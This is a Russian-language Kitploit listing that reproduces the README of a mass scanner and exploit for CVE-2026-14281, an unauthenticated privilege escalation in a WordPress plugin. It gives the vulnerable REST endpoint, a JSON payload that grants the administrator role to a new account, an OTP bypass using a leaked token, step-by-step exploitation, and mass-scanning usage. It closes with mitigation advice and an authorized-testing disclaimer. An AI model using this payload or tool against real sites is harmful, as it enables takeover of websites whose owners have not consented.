Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14281 — Массовый сканер и эксплойт для одиночной цели для CVE-2026-14281 — неаутентифицированного повышения привилегий в плагине WordPress Automation Web Platform через REST-регистрацию. | Kitploit
Инструменты/GitHubGitHub/langz337/cve-2026-14281
Повышение привилегийРазведкаСканеры уязвимостейАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHublangz337/cve-2026-14281

CVE-2026-14281

Массовый сканер и эксплойт для одиночной цели для CVE-2026-14281 — неаутентифицированного повышения привилегий в плагине WordPress Automation Web Platform через REST-регистрацию.

117 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

LANGZ Scanner + Exploit

Массовый сканер + эксплойт для одиночной цели для CVE-2026-14281 — неаутентифицированное повышение привилегий в плагине WordPress Automation Web Platform (WAWP) <= 4.8.6.


Что такое CVE-2026-14281?

Неправильное управление привилегиями (CWE-269) в плагине WordPress Automation Web Platform (от 101gen). Уязвимы версии <= 4.8.6.

ПолеЗначение
CVECVE-2026-14281
ТипНеаутентифицированное повышение привилегий
CVSS9.8 (КРИТИЧЕСКИЙ)
АутентификацияНе требуется
ЗатронутоПлагин WAWP <= 4.8.6

Первопричина

Плагин предоставляет публичный REST-маршрут:

POST /wp-json/wawp/v1/signup/<op>

Проверка прав отсутствует. Обработчик копирует контролируемые атакующим wawp_custom_fields в update_user_meta() — без белого списка. Атакующий задаёт:

{
  "wawp_custom_fields": {
    "wp_capabilities": {"administrator": true},
    "wp_user_level": "10"
  }
}

Результат: новая учётная запись получает роль administrator.

Бонус: обход OTP

Токен OTP (otp_transient) возвращается в открытом виде в теле ответа. GET-запрос с этим токеном помечает его как подтверждённый — без необходимости в email/SMS.


Воздействие

  • Полный доступ администратора к WordPress
  • Установка / удаление плагинов и тем
  • Управление пользователями, изменение контента
  • Потенциальное RCE через редакторы администратора

Сценарий эксплуатации

  1. POST полезной нагрузки на /wp-json/wawp/v1/signup/ с wp_capabilities: administrator
  2. Обход OTP с использованием токена в открытом виде из ответа
  3. Вход на /wp-login.php с новыми учётными данными
  4. Подтверждение путём доступа к /wp-admin/users.php

Требования

  • Python 3.7+
  • requests, urllib3

Установка

git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3

Использование

python3 CVE-2026-14281.py
[1] Mass Scan        -> detect many targets, save vuln to txt
[2] Verify Single    -> exploit + confirm + auto cleanup
[0] Exit

Mass Scan: файл со списком целей на входе, файл вывода (по умолчанию vuln.txt), число потоков (по умолчанию 20).

Verify Single: введите YA, укажите URL цели. Инструмент создаёт временного администратора, проверяет и затем удаляет его.


Вывод

vuln.txt содержит только подтверждённые уязвимые URL, по одному в строке:

http://target1.com
https://target2.org

Меры защиты

  1. Обновите плагин до версии выше 4.8.6
  2. Если патча нет: отключите плагин или заблокируйте /wp-json/wawp/v1/signup/
  3. Проведите аудит на наличие подозрительных учётных записей администратора
  4. Смените учётные данные при компрометации

Отказ от ответственности

For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.

Используйте с умом. Знания предназначены для защиты, а не для разрушения.

CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2026-14281

Скачать инструмент